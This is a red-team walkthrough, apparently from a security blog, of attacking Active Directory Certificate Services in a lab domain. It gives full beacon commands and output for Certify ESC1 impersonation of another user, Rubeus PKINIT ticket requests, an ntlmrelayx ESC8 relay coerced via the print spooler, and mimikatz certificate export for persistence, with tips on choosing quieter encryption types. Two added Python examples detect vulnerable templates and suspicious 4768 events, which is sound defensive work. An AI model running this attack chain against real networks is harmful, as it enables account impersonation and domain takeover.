Preface
AD CS is used to stand up a private enterprise certificate authority (CA), which then issues certificates that bind a user or machine identity (account) to a public/private key pair, so that the key pair can be used for operations such as file encryption, signing files or documents, and authentication. AD CS administrators define certificate templates, which act as blueprints for how certificates are issued: to whom, for which purposes, for how long, and with what cryptographic settings.
Body
Find the CAs with Certify's cas command
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe cas
Find misconfigured templates with Certify's find /vulnerable
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable
Several pieces of this output matter:
The template is published by sub-ca
The template is called CustomUser
ENROLLEE_SUPPLIES_SUBJECT is enabled, which lets the requester choose the subject (and a subject alternative name) in the request
DEV\Domain Users has enrollment rights, so any domain user can enroll in this template
Together with a Client Authentication EKU and no manager approval or authorized-signature requirement, this is the ESC1 condition: a low-privileged user can request a certificate for any account and then authenticate as that account.
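The conditions just listed are the ones Certify's find /vulnerable evaluates for ESC1. The following Python is an added example, not Certify's code and not part of the original post: it evaluates a template's raw AD attributes (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage, plus an enrollment-rights list) against those conditions. The template records and the DEV\ principal names are constructed to mirror the output above rather than read from a real directory, and the example goes slightly beyond the page by also showing why a template that only has ENROLLEE_SUPPLIES_SUBJECT, such as a WebServer-style template with a server-authentication EKU, does not qualify.

```python
"""ESC1 template check, mirroring what Certify 'find /vulnerable' reports.
Added example; template data below is constructed, not read from AD."""

# msPKI-Certificate-Name-Flag bit: the requester supplies subject and SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request is held for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that allow the issued certificate to be used for Kerberos PKINIT logon.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Principals that effectively mean "any domain account" (assumed DEV domain).
LOW_PRIV_PRINCIPALS = {
    "DEV\\Domain Users",
    "DEV\\Domain Computers",
    "NT AUTHORITY\\Authenticated Users",
    "Everyone",
}

ESC1_CONDITIONS = {"ENROLLEE_SUPPLIES_SUBJECT", "AUTH_EKU", "NO_APPROVAL", "LOW_PRIV_ENROLL"}


def esc1_reasons(template):
    """Return the set of ESC1 conditions this template satisfies."""
    reasons = set()
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.add("ENROLLEE_SUPPLIES_SUBJECT")
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    # An empty EKU list means "no restriction", which also permits authentication.
    if not ekus or ekus & AUTH_EKUS:
        reasons.add("AUTH_EKU")
    needs_approval = template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS
    if not needs_approval and template.get("msPKI-RA-Signature", 0) == 0:
        reasons.add("NO_APPROVAL")
    if LOW_PRIV_PRINCIPALS & set(template.get("enrollment-rights", [])):
        reasons.add("LOW_PRIV_ENROLL")
    return reasons


def is_esc1(template):
    """A template is ESC1-vulnerable only when all four conditions hold."""
    return esc1_reasons(template) == ESC1_CONDITIONS


def find_vulnerable(templates):
    """Names of ESC1 templates, in the order they were given."""
    return [name for name, t in templates.items() if is_esc1(t)]


# Constructed sample templates (attribute values chosen to illustrate each case).
SAMPLE_TEMPLATES = {
    # Mirrors CustomUser from the Certify output: every ESC1 condition present.
    "CustomUser": {
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "enrollment-rights": ["DEV\\Domain Users", "DEV\\Domain Admins"],
    },
    # User-style template: subject is built from AD, so no SAN override.
    "User": {
        "msPKI-Certificate-Name-Flag": 0xA6000000,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "enrollment-rights": ["DEV\\Domain Users"],
    },
    # WebServer-style: requester supplies subject, but EKU is server auth only.
    "WebServer": {
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
        "enrollment-rights": ["DEV\\Domain Admins"],
    },
    # Same as CustomUser but requests are pended for manager approval.
    "ManagerApproved": {
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x2,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enrollment-rights": ["DEV\\Domain Users"],
    },
}

if __name__ == "__main__":
    for name, t in SAMPLE_TEMPLATES.items():
        print(f"{name:16} ESC1={is_esc1(t)!s:5} {sorted(esc1_reasons(t))}")
```

The check is deliberately strict: a template with ENROLLEE_SUPPLIES_SUBJECT but no authentication EKU, or with manager approval enabled, is reported as not ESC1, which is the same distinction Certify draws. Note that "low-privileged" enrollment is domain-specific; extend LOW_PRIV_PRINCIPALS with whatever broad groups the target environment grants enrollment to.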
Now request a certificate with Certify, using /altname to put another user's name in the SAN
beacon> getuid
[*] You are DEV\bfarmer
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb
[*] Action: Request a Certificates
[*] Current user context : DEV\bfarmer
[*] No subject name specified, using current context as subject.
[*] Template : CustomUser
[*] Subject : CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io
[*] AltName : nlamb
[*] Certificate Authority : dc-2.dev.cyberbotic.io\sub-ca
[*] CA Response : The certificate had been issued.
[*] Request ID : 11
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:05.4521116
Save the PEM output (private key and certificate) as cert.pem and convert it to a PFX with openssl, choosing an export password
ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password: pass123
Verifying - Enter Export Password: pass123
This produces cert.pfx; base64-encode it on a single line so it can be passed to Rubeus
ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0
MIIM7w[...]ECAggA
Use Rubeus to request a TGT with this certificate via PKINIT. Rubeus reports the certificate subject (Bob Farmer), but the KDC maps the ticket to nlamb from the SAN. Note that without /enctype Rubeus asks for an RC4 ticket, which stands out in logs; /enctype:aes256 as used further below is the quieter choice.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap
[*] Using PKINIT with etype rc4_hmac and subject: CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQj[...]5pbw==
ServiceName : krbtgt/dev.cyberbotic.io
ServiceRealm : DEV.CYBERBOTIC.IO
UserName : nlamb
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 9/7/2022 8:51:22 AM
EndTime : 9/7/2022 6:51:22 PM
RenewTill : 9/14/2022 8:51:22 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : AliVFc5Nk93Z7IUkweCnBQ==
ASREP (key) : 4DB9D9D76701696109C28A26D27DE0B0
AD CS also supports enrollment over HTTP and ships a web enrollment interface (certsrv). That endpoint accepts NTLM authentication, and if it is reachable over HTTP or not protected by Extended Protection for Authentication, an NTLM relay can enroll a certificate as the relayed account (ESC8).
Here we use NTLM relay as the example
Start ntlmrelayx, targeting the certsrv endpoint
attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
Coerce a callback via the print spooler (first argument is the target machine, second is the listener the relay server sits behind)
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102
[*] Servers started, waiting for connections
[*] SMBD-Thread-4: Received connection from 127.0.0.1, attacking target https://10.10.122.10
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:443-<><>-OK
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against https://10.10.122.10 as DEV/WEB$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 13
[*] Base64 certificate of user WEB$:MIIRRQ[...]qDRJLE
The base64 PFX for WEB$ can be fed to Rubeus asktgt in the same way as above to obtain a TGT for the machine account. Next, persistence.
Enumerate the local certificate stores with Seatbelt's Certificates command
beacon> getuid
[*] You are DEV\nlamb
beacon> run hostname
wkstn-1
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates
StoreLocation : CurrentUser
Issuer : CN=sub-ca, DC=dev, DC=cyberbotic, DC=io
Subject : [email protected], CN=Nina Lamb, CN=Users, DC=dev, DC=cyberbotic, DC=io
ValidDate : 9/7/2022 11:44:35 AM
ExpiryDate : 9/7/2023 11:44:35 AM
HasPrivateKey : True
KeyExportable : True
Thumbprint : 43FA3C3AE4E1212A3F888937745C2E2F55BAC1B5
Template : User
EnhancedKeyUsages :
Encrypting File System
Secure Email
Client Authentication [!] Certificate is used for client authentication!
Export the user's certificate and private key with mimikatz crypto::certificates (the PFX is written with the password "mimikatz"); since the key is marked exportable no patching is required
beacon> mimikatz crypto::certificates /export
Public export : OK - 'CURRENT_USER_My_0_Nina Lamb.der'
Private export : OK - 'CURRENT_USER_My_0_Nina Lamb.pfx'
beacon> download CURRENT_USER_My_0_Nina Lamb.pfx
[*] started download of C:\Users\nlamb\CURRENT_USER_My_0_Nina Lamb.pfx (3454 bytes)
[*] download of CURRENT_USER_My_0_Nina Lamb.pfx is complete
Export the machine account certificate from the local machine store (this needs an elevated Beacon; the ! prefix runs mimikatz as SYSTEM), then use it with Rubeus for a TGT as the machine account
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
Public export : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.der'
Private export : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.pfx'
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap
[*] Action: Ask TGT
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=wkstn-1.dev.cyberbotic.io
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\WKSTN-1$'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGYD[...]5pbw==
ServiceName : krbtgt/dev.cyberbotic.io
ServiceRealm : DEV.CYBERBOTIC.IO
UserName : WKSTN-1$
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 9/7/2022 12:06:02 PM
EndTime : 9/7/2022 10:06:02 PM
RenewTill : 9/14/2022 12:06:02 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 6DV6vQB5lRoCz84qmRqt0X6UdIzzdQiX+y0IwwDrHlc=
ASREP (key) : C1B715AF5F9B5468EB5FA8ADDA0E02EE2D7548F439DEA5A5D9B4F7DFA6482BDF
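Both Rubeus asktgt /certificate requests above (the nlamb impersonation with an RC4 ticket, and the WKSTN-1$ request with AES256) leave a Security event 4768 on the domain controller whose Pre-Authentication Type is 16 (PA-PK-AS-REQ) and whose Certificate Information fields are populated. The following Python is an added example, not from the original post: it parses constructed 4768-style records and flags two things a defender would want to see, a PKINIT logon that received an RC4 ticket (the Rubeus default when /enctype is omitted) and a machine account's certificate being used from an address other than the machine itself, as happens with the relayed WEB$ certificate. The event text, thumbprints and the per-host address baseline are constructed for the example; 10.10.123.102 is the attacker address from the SharpSpoolTrigger command and the other addresses are assumptions.

```python
"""Hunt for suspicious PKINIT TGT requests in Windows Security event 4768.
Added example; the event records and address baseline below are constructed."""
import re

PA_PKINIT = 16      # Pre-Authentication Type 16 = PA-PK-AS-REQ (certificate)
ETYPE_RC4 = 0x17    # RC4-HMAC, the Rubeus asktgt default without /enctype

# Assumed baseline: the address each machine account normally logs on from.
EXPECTED_ADDR = {"WKSTN-1$": "10.10.123.101", "WEB$": "10.10.122.30"}

# Constructed 4768 records, rendered as the event message's key: value lines.
SAMPLE_EVENTS = """\
EventID: 4768
Account Name: nlamb
Client Address: ::ffff:10.10.123.101
Ticket Encryption Type: 0x17
Pre-Authentication Type: 16
Certificate Issuer Name: sub-ca
Certificate Thumbprint: 0F1E2D3C4B5A69788796A5B4C3D2E1F00F1E2D3C
---
EventID: 4768
Account Name: WKSTN-1$
Client Address: ::ffff:10.10.123.101
Ticket Encryption Type: 0x12
Pre-Authentication Type: 16
Certificate Issuer Name: sub-ca
Certificate Thumbprint: 1122334455667788990011223344556677889900
---
EventID: 4768
Account Name: WEB$
Client Address: ::ffff:10.10.123.102
Ticket Encryption Type: 0x12
Pre-Authentication Type: 16
Certificate Issuer Name: sub-ca
Certificate Thumbprint: AABBCCDDEEFF00112233445566778899AABBCCDD
---
EventID: 4768
Account Name: bfarmer
Client Address: ::ffff:10.10.123.101
Ticket Encryption Type: 0x12
Pre-Authentication Type: 2
Certificate Issuer Name:
Certificate Thumbprint:
"""


def parse_events(text):
    """Split the record dump on '---' and turn each record into a dict."""
    events = []
    for block in text.strip().split("---"):
        ev = {}
        for line in block.strip().splitlines():
            m = re.match(r"^([^:]+):\s*(.*)$", line)
            if m:
                ev[m.group(1).strip()] = m.group(2).strip()
        if ev:
            events.append(ev)
    return events


def client_ip(ev):
    """4768 renders IPv4 clients as IPv4-mapped IPv6 ('::ffff:a.b.c.d')."""
    addr = ev.get("Client Address", "")
    return addr[7:] if addr.startswith("::ffff:") else addr


def hunt_pkinit(events):
    """Return (account, reason) findings for certificate-based TGT requests."""
    findings = []
    for ev in events:
        if ev.get("EventID") != "4768":
            continue
        if int(ev.get("Pre-Authentication Type", "0")) != PA_PKINIT:
            continue  # password or key based pre-auth, not a certificate logon
        acct = ev["Account Name"]
        etype = int(ev.get("Ticket Encryption Type", "0"), 16)
        if etype == ETYPE_RC4:
            findings.append((acct, "PKINIT logon with RC4 ticket (Rubeus default; "
                                   "Windows clients negotiate AES)"))
        if acct.endswith("$"):
            expected = EXPECTED_ADDR.get(acct)
            if expected and client_ip(ev) != expected:
                findings.append((acct, f"machine certificate used from {client_ip(ev)}, "
                                       f"expected {expected}"))
    return findings


if __name__ == "__main__":
    for acct, reason in hunt_pkinit(parse_events(SAMPLE_EVENTS)):
        print(f"[!] {acct}: {reason}")
```

The second rule is what catches the ESC8 outcome: the WEB$ certificate was enrolled by relaying WEB$'s own NTLM authentication, so every later PKINIT logon with it comes from the attacker's host rather than from WEB. Pairing the 4768 thumbprint with the CA's issuance records (event 4887 or the CA database) additionally shows which template and requester produced the certificate.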
To request a machine account certificate with Certify instead, add the /machine parameter so the request is made as SYSTEM (this also requires an elevated Beacon)
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:Machine /machine
Originally published on the WeChat public account Th0r安全: "Several ways to attack Active Directory CS"